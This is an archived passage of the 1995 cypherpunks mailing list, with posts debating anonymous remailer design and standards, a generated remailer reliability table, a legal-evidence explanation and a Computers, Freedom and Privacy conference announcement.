  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 6 Feb 95 03:55:41 PST
To: nzook@bga.com (Nathan Zook)
Subject: Re: Cooperation
In-Reply-To: <Pine.3.89.9502060545.E19655-0100000@ivy.bga.com>
Message-ID: <199502061154.DAA11069@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook wrote:

> But there is a major difference between active cooperation and agreeing to
> a standard.  Active cooperation is just that--something which cannot be
> automated, or which involves automated judgement decisions.  I claim that
> my ideas are merely standards.  A standard which might even be extendable
> into the dominions of a hostile government.

Yes! Standards are not collusion. In fact, standards can lessen the
amount of ad hoc contact needed between remailer operators, and thus
reduce somewhat the prospects for compromise and collusion.

Robust standards are also helpful for building "hands-off" remailers,
in which remailer account owners take a hands-off approach, possibly
even to the point of creating the accounts and then never checking
again.

The proposals I've made, sometimes called a "Remailer's Guild," were
not for a cabal, but for a market standard that would tend to reward
those who follow certain standards and punish (all in a market sense)
those who flout standards just for the sake of being different.

(The real idea was to get some progress on deciding on some features
and terminology, to the point that a "Release" version could be
produced, like PGP 2.6, for example.)

It may be that such convergence on standards can be done without any
contact at all, just through market forces and things like pinging
scripts. The remailer analog of a self-healing network, rerouting
around brain-damaged sites.

--Tim May, posting at 3:55 a.m. because this is my jet lag rebound
period, in which I can't go to sleep because I slept for 11 hours upon
my arrival at home


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an448@freenet.carleton.ca (Yves Bellefeuille)
Date: Mon, 6 Feb 95 01:33:14 PST
To: cypherpunks@toad.com
Subject: Re: Legal implications of one-of-a-group guilt
Message-ID: <199502060933.EAA16328@freenet2.carleton.ca>
MIME-Version: 1.0
Content-Type: text/plain


>Well, I'm not so sure. DNA fingerprinting has soared in popularity for
>criminal cases over the last decade or so. From the figures I vaguely recall
>being quoted, such evidence of a DNA match narrows down a list of
>suspects to a mere few hundred thousand people, and is commonly admitted into
>evidence. This situation is reminiscent of that phenomenon, IMHO.
>
>I imagine that the looser standard of evidence in civil cases would make such
>information quite significant in determining "the preponderance of evidence".
>
>It would be interesting to hear from some folks with legal training on this 
>issue, if only to correct my mistakes. IANAL.

Well, I missed the beginning of this, but here's the general principle.
Any evidence is admissible which makes it more likely that whatever you're
trying to prove is true rather than untrue.

For example, I want to prove that you stole my watch. I can prove that the
thief is a man: since you are a man, this makes it more likely than before
that you are the thief. It doesn't prove that you did it, but it goes in
that direction -- it narrows it down. Okay? 

Now, here's the important corollary. If the jury is likely to give undue
weight to the evidence, it can be inadmissible even though it would be
admissible under the general principle. Lie detector tests are a good
example of this, at least in Canada: they're not admissible, and the
reason they're not admissible isn't because they don't prove with 100 %
certainty, but because the jury is likely to think they're much more
reliable than they actually are. 

Since I have no idea what the original topic was, I leave it to you to
apply these general rules to your specific concern as an exercise. :-)

Disclaimer: Since I'm in Canada, obviously I can't give any advice
regarding US law.

Regards,

--
Yves Bellefeuille, Ottawa, Canada
an448@freenet.carleton.ca (finger here for PGP key)
ua294@fim.uni-erlangen.de




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 6 Feb 95 02:00:36 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: Excerpts of signed messages
In-Reply-To: <199502060423.UAA18043@jobe.shell.portal.com>
Message-ID: <199502061000.FAA01701@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> (I forget if this was posted here last year, it sounds familiar.)

Some of us are relatively new to the list...
> 
> Suppose I get a PGP-signed flaming message, full of insults, and at the
> end it says, sarcastically, "For a stupid moron, you've made some very
> nice postings."  I could choose to excerpt this last part, "...you've made
> some very nice postings", and exhibit it in signed form.  What I would do

In other words, you'd like to retain an excerpt from the message with the
signature still intact?

Problem with that is how do you prevent one from creating a clerverly made
excerpt that distorts what one is saying (but has a valid signature)? It
seems your example does this very thing.

Better to quote the unsigned portion but retainthe original signed message
as evidence that the excerpt is Ok.

[ Snip! ]

> The checker would know he was dealing with an excerpt, and that it came
> from the end of the message, but he would have know way of knowing what
> was in the part that was removed.

That's the problem, of course.

> 
> Hal
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 6 Feb 95 02:03:53 PST
To: harmon@tenet.edu (Dan Harmon)
Subject: Re: dna ink
In-Reply-To: <Pine.3.89.9502052222.B22385-0100000@Joyce-Perkins.tenet.edu>
Message-ID: <199502061003.FAA01784@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> I just saw an item on CNN about a company in LA called Art Guard.  It 
> sells an ink that is created using your dna as a protection against 
> forged signatures.
> 
> Interesting.

Yes, I've seen that too. They insisted it will always be secure, especially
if one keeps changing the ink...

...probably will be until DNA cloning becomes cheap and accessible...

BTW, I think that company also had other ideas to use cheap cloning technology
such as distributing icons of famous people (Jerry Garcia was an example) that
had bits of their DNA in them... 

> 
> Dan
> 
> 
Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 6 Feb 95 02:26:23 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <199502060431.UAA18798@largo.remailer.net>
Message-ID: <9502061025.AA03724@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
> Perry advocates IPSP as an almost-panacea for Internet security.  I
> disagree.

Well, no; it doesn't fix things like mail for which the data needs to
be protected but not the link. However, I think I can answer some of
your other objections...

> TIA on netcom.

TIA is sort of a short term hack people are using to get around having
to have their administrators manage SLIP or PPP properly; I suspect
this difficulty will vanish with time.

> It's fallacious to argue simply that everyone's going to be _on_ the
> Internet soon enough anyway,

Well, IBM of all firms is trying very hard to make sure you are, and
Microsoft is even investing in UUNet to try to make sure of it, too.

Remember, by the way, that PPP is far cheaper per customer than shell
accounts, even though moronic providers right now don't make it look
that way.

IP is ultimately designed to be a proxy protocol that will work over
anything -- stuff like TIA simply gets around temporary mental
difficulties among providers in seeing things that way...<

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 6 Feb 95 03:30:23 PST
To: cypherpunks@toad.com
Subject: Frothing remailers - an immodest proposal
Message-ID: <Pine.3.89.9502060510.C19655-0100000@ivy.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


 
kevin@elvis.wicat.com:
 
>Be gentle, though - it's my first time.
 
Here?  You jest.  ;)
 
>It seems to me that the current remailer web suffers a fundamental flaw.
>It is simply too static. When a remailer disappears, service is
>disrupted and messages are lost. Humans have to statically route their
>messages through the web either by hand or using relatively primitive
>tools such as the chain script (not to belittle the useful work that has
>been done, but it is by no means idiot proof yet). Basically, the
>current web of mailers shows nothing of the dynamic nature that has kept
>the internet alive and has offered us a decent chance at truly anonymous
>communications, nor is it easy to use to its full potential.
>
>Consider a more dynamic web of remailers. I envision remailers that
>actively advertise their presence on the web so that all active
>remailers are aware of all other active remailers. This advertising is
>to have very low latency so that a new mailer can be known to the web
>within minutes (I will address the implementation of this later). Thus,
>remailers can constantly be appearing and disappearing without impact on
>the web as a whole (I refer to this dynamic web of remailers as a
>"froth"). Imagine also that remailers are allowed to dynamically perform
>the routing functions that are currently done statically offline (for
>reasons I will discuss shortly).
>
 
Some version of this discussion came up a few months ago, and I passed on
it then, but I think I've heard enough to comment now:
 
The remailers are based on an inherently different model than the InterNet.
Some of these differences, in fact, are crucial.
 
1) The InterNet is based on mutual cooperation/mutual trust.  Cypherpunks
   trust no one that they don't have to.
 
This is not just a result of our twisted psyche.  If we could trust
everyone, we wouldn't _need_ remailers.  Since we don't even know who is
whom out there, we avoid extending trust.
 
2) The InterNet is concerned first about reliability, and not at all about
   privacy.  The remailers are concerned first about privacy, and can leave
   reliability to the users, if need be.
 
There is nothing to prevent Alice and Bob agreeing to send each other ACK
statements, and retransmitting messages if they don't get the ACK.  There
has been some mention of remailers doing the same with each other, in an
attempt to improve net-wide reliability.  BTW, with T1, sending ACKs is not
unreasonable between remailers.
 
3)  From 1) and 2).  The remailers are heading towards mandatory PGP,
    possibly nested.  All InterNet messages are world-readable--although
    this may be changing as the model breaks down.
 
Again, this has to do with the intrinsic diffences.
 
>The use of such transient routers implies allowing dynamic routing. If
>any given remailer may go down or move at any point, it is impractical
>to expect users to keep track of which are up at the moment and create
>static routes in the current manner. The only reasonable solution I have
>come up with is to allow the remailers themselves to choose routing,
>given that they have full knowledge of the current state of the froth.
 
Here we have the real head of the problem, as Hal so asutely points out:
in your model, if the first remailer is bad, the message is compromised.
If user encrypt to all remailers, they might as well encrypt directly to
mole@snakeoil.nsa.gov.  If they don't, they severly limit who can pick out
their messages.  In particular, they bypass transient remailers.
 
But that isn't all.  If the remailers pick the route, they are in a no
better state than the users.  Since the flushing attack requires remailers
to operate on ticks, with carryover, an hour delay per remailer is almost
minimal, untill traffic really picks up.  So if some message routes through
four remailers, a minimum of four hour delay results.  In your case, this
could easily move between in/out of service modes.
 
 
>                 Think about the proposed extension to MixMaster to
>allow separate parts of a multi-part message to be routed separately,
>and consider whether you really want to have to do this by hand. I
>strongly suspect that most messages are currently routed via boilerplate
>scripts, which has to make the job of traffic analysis much easier for
>our good friend Eve.
 
Stupid is as stupid does.
 
 
>By the way, a brief rant on a related topic; people speak of not
>trusting remailers any further than necessary, while I am clearly
>suggesting granting more authority and trust to the remailers. This
>notion of not assigning trust is simply nonsense. When you send a piece
>of mail to a remailer, encrypted or not, you are assigning complete
>trust in that remailer to keep you anonymous and not to forward your
>mail to the NSA immediately.
 
NOT TRUE.  With proper use of encryption, you are trusting your first
remailer only to not reveal that you sent a message, and not to correlate
that message to the one it sends out.  With rational use of garbage running
two deep, you can even suffer this loss without significant harm.
 
 
>This does lead to a related problem, however; if we allow remailers to
>pop up at random and join in the froth, how do we know that Deitweiller
>won't set up a number of black hole remailers that take your mail and
>throw it away, disrupting the froth, or forward it to nphard@nsa.gov?
 
How indee  The reason we chain is buse we _don't_ really trust our
first remailer--or any other.
 
>Fortunately, we already have the PGP web of trust model in place and can
>use it to good effect in this case. Remailers should simply not route
>mail through any remailer whose public key is not trusted unless
>explicitly ordered otherwise. This requires remailer operators to
>cooperate to some extent to validate one another's remailer keys, but
>does confer the great advantage of portable remailers as mentioned
>above; if I run a trusted remailer on one machine, I can move it to
>another machine, and as soon as I advertise the new address and the PGP
>public key, it is a trusted and useful part of the froth.
 
Actually, there may be something here.  I don't know about you all, but my
PGP isn't very happy about all these new remailer keys.  We could agree to
the following standard:  Signing a remailers' key means that you believe
the remailer to be secure.  Trusting a remailer key means trusting the
remailer operator to validate other remailer's security.  This adds a whole
new meaning to the phrase, "key compromise certificate".
 
 
>While we are advertising a PGP key and internet address, we might as
>well incorporate other useful information. For instance, remailers could
>advertise their maximum latency. 
 
While I agree that it is useful to post the operating characteristics of
the remailers, the maximum latency must theoretically be infinite in the
standard model to prevent flushing attacks.
 
>    Kevin
 
 
 
Hal <hfinney@shell.portal.com>:
 
 
>I do like Kevin's ideas about a dynamic remailer net, but I think
>another approach would put more smarts into the client program used by
>the originator.  
 
Hear ye, hear ye!  And along those lines...
 
I'm scetchy (at best) by what is meant by "pinging" a remailer.  Would it
not be possible for live-on-the-net remailers to accept a (socket?) quick
check to see if they are online?  If so, then the ping would only work if
the remailer was active when tried.  Furthermore, client software could
startup by sending out these pings, and presenting only responding
remailers to the user--with an exception list for those not "live".
 
Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 6 Feb 95 03:31:24 PST
To: cypherpunks@toad.com
Subject: Cooperation
Message-ID: <Pine.3.89.9502060545.E19655-0100000@ivy.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal:
   I agree that it is to our advantage to minimize the cooperation between
remailers, for the following reasons:
 
1)  The existance of a cabal dominating such a function admits the
posibility of the abuse of power, for whatever reason.
 
2)  The requirement of cooperation between remailers limits the size of the
remailer net to the number of operators that can effectively cooperate with
each other.  (Yes, we can extend via overlapping groups, but this
introduces chokepoints--another weakness.)
 
3)  The requirement of cooperation between remailers raises the cost (in
time and legal vulnerabilities) to enter the remailer net.
 
4)  Failing all of these, there is a real chance (happening even now) that
users will trust the operators too much.
 
 
But there is a major difference between active cooperation and agreeing to
a standard.  Active cooperation is just that--something which cannot be
automated, or which involves automated judgement decisions.  I claim that
my ideas are merely standards.  A standard which might even be extendable
into the dominions of a hostile government.
 
Nathan
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 6 Feb 95 06:49:53 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199502061450.GAA28746@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@204.95.228.28

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"myriad"} = "<remailer@myriad.pc.cc.cmu.edu> cpunk pgp hash latent cut ek";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk hash latent cut ek";
$remailer{"q"} = "<q@c2.org> cpunk pgp hash latent cut ek";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp";
$remailer{"tower"} = "<remailer@tower.techwood.org> cpunk pgp";
$remailer{"eniac"} = "<vanklava@eniac.ac.siue.edu> cpunk pgp hash latent cut";
$remailer{"charon"} = "<charon@styx.jpunix.com> cpunk hash latent cut ek";
$remailer{"bonafide"} = "<remailer@bonafide.jpunix.com> cpunk hash latent cut ek";
$remailer{"ford"} = "<ford@prefect.jpunix.com> cpunk hash latent cut ek";
$remailer{"aegis"} = "<aegis@athena.jpunix.com> cpunk";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.

JPUNIX.COM offers a domain hiding service for remailers. Send email to 
perry@jpunix.com for more information. NOTE: JPUNIX.COM itself does not 
run a remailer. All subdomains of jpunix.com on this list are remailers 
that are not physically located on jpunix.com

Use "premail -getkeys remailer.help.all@204.95.228.28" as a stopgap to
get PGP keys for the remailer, at least until Matt Ghio gets his
machine situation straightened out. Fingering this address works too.

Last ping: Mon 6 Feb 95 6:00:01 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
rahul    homer@rahul.net                  -*+****#-*+#    19:19  99.88%
alumni   hal@alumni.caltech.edu           +****-*##* #     9:02  99.87%
eniac    vanklava@eniac.ac.siue.edu         #***+#***#     6:06  99.88%
penet    anon@anon.penet.fi               *+**+*+++-+*  1:40:22  99.99%
tower    remailer@tower.techwood.org        *********#     7:38  99.88%
mix      mixmaster@nately.ucsd.edu        --*-++++++++    43:06  99.85%
nately   remailer@nately.ucsd.edu         --++++++++++    41:00  99.85%
portal   hfinney@shell.portal.com         +***#-*##* #     6:53  99.85%
xs4all   remailer@xs4all.nl               **-*+++**+**    16:46  99.75%
charon   charon@styx.jpunix.com               #-++-*      26:06  99.78%
bonafide remailer@bonafide.jpunix.com           ##****     6:39  99.68%
ford     ford@prefect.jpunix.com                ++-+++    27:13  99.67%
soda     remailer@csua.berkeley.edu       .--.._.....   9:02:42  99.56%
myriad   remailer@myriad.pc.cc.cmu.edu     +***-******    37:47  99.37%
vox      remail@vox.xs4all.nl             ...---..--   22:10:50  99.51%
usura    usura@replay.com                 *+-****+ ***    15:05  98.98%
aegis    aegis@athena.jpunix.com                          15:55  99.07%
c2       remail@c2.org                    +++ - ++-+++  1:44:28  97.95%
syrinx   syrinx@c2.org                    ***  +++-*      30:09  97.85%
q        q@c2.org                         --+--+++-++   1:13:16  97.75%
flame    tomaz@flame.sinet.org             +***-******    59:14  97.51%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***+ *--**-*  1:38:08  96.72%
ideath   remailer@ideath.goldenbear.com   --------- --  2:04:17  95.12%
desert   remail@desert.xs4all.nl          .-___.-_.-   48:16:44  68.02%
rebma    remailer@rebma.mn.org            _.-_---      21:10:27  41.53%
extropia remail@extropia.wimsey.com                     5:04:09   6.34%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in relpy blocks using Encrypt-Key:
          header.


Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Mon, 6 Feb 95 06:27:43 PST
To: cypherpunks@toad.com
Subject: Change to the congressional contact list
Message-ID: <Pine.SV4.3.91.950206082059.3359A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


The congressional fax/phone list that I recently posted has at least one 
error in it. Senator Rod Grams' fax number is (202) 228-0956. The amended 
list will be available on the auto-responder in about 15 minutes. To get 
a copy:

Send a message to: skaplin@c2.org
With the subject: SEND FILE congresscritter.104

You should get it within two hours.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Corbet <corbet@stout.atd.ucar.edu>
Date: Mon, 6 Feb 95 07:37:21 PST
To: cypherpunks@toad.com
Subject: Re: Vinge on PKE ? (really idiot savants)
Message-ID: <199502061537.IAA20779@atd.atd.ucar.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> These so-called "idiot savants" can easily factor
> 100 digit numbers.  The ability to solve such problems is not tied to IQ,
> as there are many such people with IQs of 150+ who cannot solve them.

Gee...such a person could do a pretty thorough job on a 512-bit RSA key.
How many of them do you suppose the NSA employs?

:-)

jon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 6 Feb 95 08:51:56 PST
To: cypherpunks@toad.com
Subject: Re:  Cooperation
Message-ID: <199502061651.IAA02758@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Nathan Zook <nzook@bga.com>
>    I agree that it is to our advantage to minimize the cooperation between
> remailers, for the following reasons:
> [...]
> But there is a major difference between active cooperation and agreeing to
> a standard.  Active cooperation is just that--something which cannot be
> automated, or which involves automated judgement decisions.  I claim that
> my ideas are merely standards.  A standard which might even be extendable
> into the dominions of a hostile government.

I see your point.  I tend to have something of a knee-jerk reaction
against proposals which put more responsibility into the hands of the
remailer operators, but as you say the mere promulgation of a standard
does not in itself require cooperation.  We have de-facto standards
right now, which is what makes chaining possible.

And from the technical point of view, the idea of remailers encrypting
between themselves seems to do no harm and could possibly make the
attacker's job potentially more difficult by reducing the amount of
information he has available.

One problem is that one remailer may not know about all of the others.
So to the extent that your proposal requires a registry of remailers, a
centralized service which keeps track of all remailers, I still have a
problem.  This is where my vision departs from those who see the
"remailer net" as an entity, and for whom the notion that remailers would
treat messages to each other specially is a natural assumption.  If you
would suggest that at each stage the message included not only the
address of the next remailer, along with the "payload" which was already
encrypted (by the sender) for that remailer, but in addition a key for
that remailer and a request to encrypt under that key, then I would feel
much better about it.  This way there is no need for the remailer to know
anything about whom it is sending to.

Likewise if we wanted to specify in the standard that messages could be
signed, that also would not imply collusion.  However to specify that
signatures must be checked would have some implications about acquiring
the necessary public keys through some means, and I don't think that
should be done.

I do like the idea of standards.  In fact I wonder if the current "mark
1" remailer command set shouldn't be documented as an Internet RFC.  It
has been in use for a couple of years now, evolving somewhat over that
time, and some twenty or thirty remailers have operated for some part of
that time following that spec.  It would also give a certain amount of
(undeserved, perhaps) respectability to remailer operators if there were
an actual numbered RFC which they were following.  And it does seem to me
that this kind of thing is exactly what the RFC's are for.  Certainly
there are a great many "minor" RFC's which are less followed than our
remailer standards.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLzZTfBnMLJtOy9MBAQFsRwIA4A5EzFZwJdEmSvcfMmnu+RCAEGYK56dg
y2LBawLdYn5FNcnvH6YkfCMHIcWURm1b6emEsw32FVH2m6ScAAH/iQ==
=F2+s
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jltocher@CCGATE.HAC.COM
Date: Mon, 6 Feb 95 11:17:09 PST
To: Cypherpunks@toad.com
Subject: To Bundle Or Not To Bundle?
Message-ID: <9501067920.AA792098085@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


     From Edupage:
     
     TO BUNDLE OR NOT TO BUNDLE? THAT IS THE MICROSOFT QUESTION 
     One of the fears Microsoft rivals have is that Microsoft will build 
     directly into the Windows operating system various applications 
     software packages (such as encryption for financial processing over 
     the Internet), because customers would be reluctant to pay for 
     products that do more-or-less the same thing as an installed product 
     that they get "for free." Although it's unlikely that the government 
     would consider breaking Microsoft up into separate companies, it is 
     conceivable that it could force Microsoft to limit what it includes 
     with its operating systems. (The Economist 1/28-2/3/95 p.61)
     
John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where 
JLTocher@earthlink.net        you are never lost. Your private map where every 
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you 
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe
     
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 6 Feb 95 08:09:47 PST
To: cypherpunks@toad.com
Subject: Re: Camden New Jersey
In-Reply-To: <9502061348.AA14911@anon.penet.fi>
Message-ID: <9502061609.AA04485@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



What does this have to do with cryptography per se?

.pm

beacher says:
> 
> I thought nothing but armed robberies happened in Camden New Jersey.
> 
> Teenage Pirate To Pay $25,000, Loses BBS Equipment
> CAMDEN, NEW JERSEY, U.S.A., 1995 FEB 3 (NB) -- A teenage computer operator
> charged with illegally distributing hundreds of copyrighted commercial
> software programs has reached a settlement with Novell Inc., (NASDAQ: NOVL)
> and Microsoft Corp., (NASDAQ: MSFT).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Date: Mon, 6 Feb 95 08:48:13 PST
To: cypherpunks@toad.com
Subject: CFP'95 Program/Registration Information (fwd)
Message-ID: <Pine.3.89.9502061157.A589326734-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Sun, 05 Feb 1995 12:43:36 -0500 
From: Carey Heckman <ceh@leland.Stanford.EDU>
To: Multiple recipients of list <cyberia-l@birds.wm.edu>
Subject: CFP'95 Program/Registration Information 

The Fifth Conference on Computers, Freedom and Privacy

Sponsored by:          * ACM SIGCOMM, SIGCAS, SIGSAC, and
                       * Stanford Law School

28 - 31 March 1995
San Francisco Airport Marriott Hotel
Burlingame, California

CONNECT WITH OTHERS WHO ARE DETERMINING HOW COMPUTERS AND TELECOMMUNICATIONS
WILL AFFECT YOUR FREEDOM AND PRIVACY... 

JOIN US AT CFP'95.

We have reached the crossroads of the Information Age.

No longer is the electronic frontier inhabited solely by a small band of 
technical pioneers sharing a common code of conduct. Computer and 
telecommunications technologies have become part of mainstream living, 
conversation, and politics. These changes compel us to reexamine the 
definition of our rights and the processes by which those rights are being 
defined. 

The Fifth Conference on Computers, Freedom and Privacy will assemble experts,
advocates and interested people from a broad spectrum of disciplines and
backgrounds in a balanced public forum to explore and better understand the
definition of our rights at this crossroads.

Participants will include people from the fields of computer science, law,
business, research, information, library science, health, public policy,
government, law enforcement, public advocacy, and many others.

Featured speakers include:

John P. Morgridge, Chairman, Cisco Systems
Esther Dyson, Release 1.0/EDVenture Holdings, Inc.
Roger W. Wilkins, Professor of History and American Culture at George 
	Mason University and commentator, National Public Radio
Margaret Jane Radin, Professor of Law, Stanford University
Willis H. Ware, RAND 

Some of the topics in the CFP'95 program include:

FREEDOM AND RESPONSIBILITY OF ELECTRONIC SPEECH -- Exploring recent
controversies in online free speech, including a Socratic forum
that will ask whether the Constitution can indeed be viewed through a
technologically transparent lens.

HIS MASTER'S VOICE... -- Probing the future for "net propaganda" from
governments, government officials, and politicians, and who will pay 
so whose message will get to whom.

STUDENT DATABASES: FOR EDUCATION AND FOR LIFE? -- Looking at how gaining the
benefits of nationwide information about K-12 students could also spell
serious privacy problems.

CAN THE NET SURVIVE COPYRIGHT? CAN COPYRIGHT SURVIVE THE NET? -- Delving
into the controversies surrounding copyright protection that throttles 
freedoms and copyright protection that protects just rewards for creativity.

INTELLIGENT TRANSPORTATION SYSTEMS: PAVING OVER PRIVACY -- Examining the
privacy implications of tracking and surveillance technologies now being
planned for vehicles and roadways nationwide.

"IT OUGHTA BE A CRIME..." -- Debating with law enforcement representatives
about who should set the rules for governing the net and when should bad 
manners become a crime.

WHEN DO THEY NEED TO KNOW 'WHODUNNIT'? -- Discussing the right time and
places for identified, anonymous, and pseudonymous transactions.

TRANSACTION RECORDS IN INTERACTIVE SERVICES: WHO WATCHES THE SERVERS? --
Looking at the issues raised by the collection of personal information
as part of the new interactive home entertainment, telecommunications,
and online services.

DEFINING ACCESS PARADIGMS: LIBRARIES, RURAL AREAS, AND INTERNATIONAL 
ASPECTS -- Evaluating the differing models of "open access" to Internet and
computer-mediated communications in the library, rural, and lesser-developed
country contexts.

THE CASE AGAINST COMPUTERS: A SYSTEMIC CRITIQUE -- Daring to discuss whether
computers may be doing our world more harm than good.

A NET FOR ALL: WHERE ARE THE MINORITIES? -- Examining how and to what degree
minority groups participate on the net and asking whether social class is
relevant to net participation or non-participation.

WHO OWNS THE LAW? -- Reviewing the debate over legal citation form and online
databases, and what it means to all of us.

CAN WE TALK LONG-DISTANCE? REMOVING IMPEDIMENTS TO SECURE INTERNATIONAL
COMMUNICATIONS -- Covering export and import controls, outright prohibitions,
and other technical and policy obstacles to secure international
communications.

The Fifth Conference on Computers, Freedom, and Privacy will also offer a 
number of in-depth tutorials on subjects including:

   *	Inside Washington: The New Congress and Secrets of Advocacy
   *	National ID Card Initiatives
   *	The Law of Fundamental Rights for Non-Lawyers 
   *	Everything You Need to Know to Argue About Cryptography
   *	Digital Activism
   *	Inside the World of Law Enforcement
   *	Intellectual Property for the Information Age 

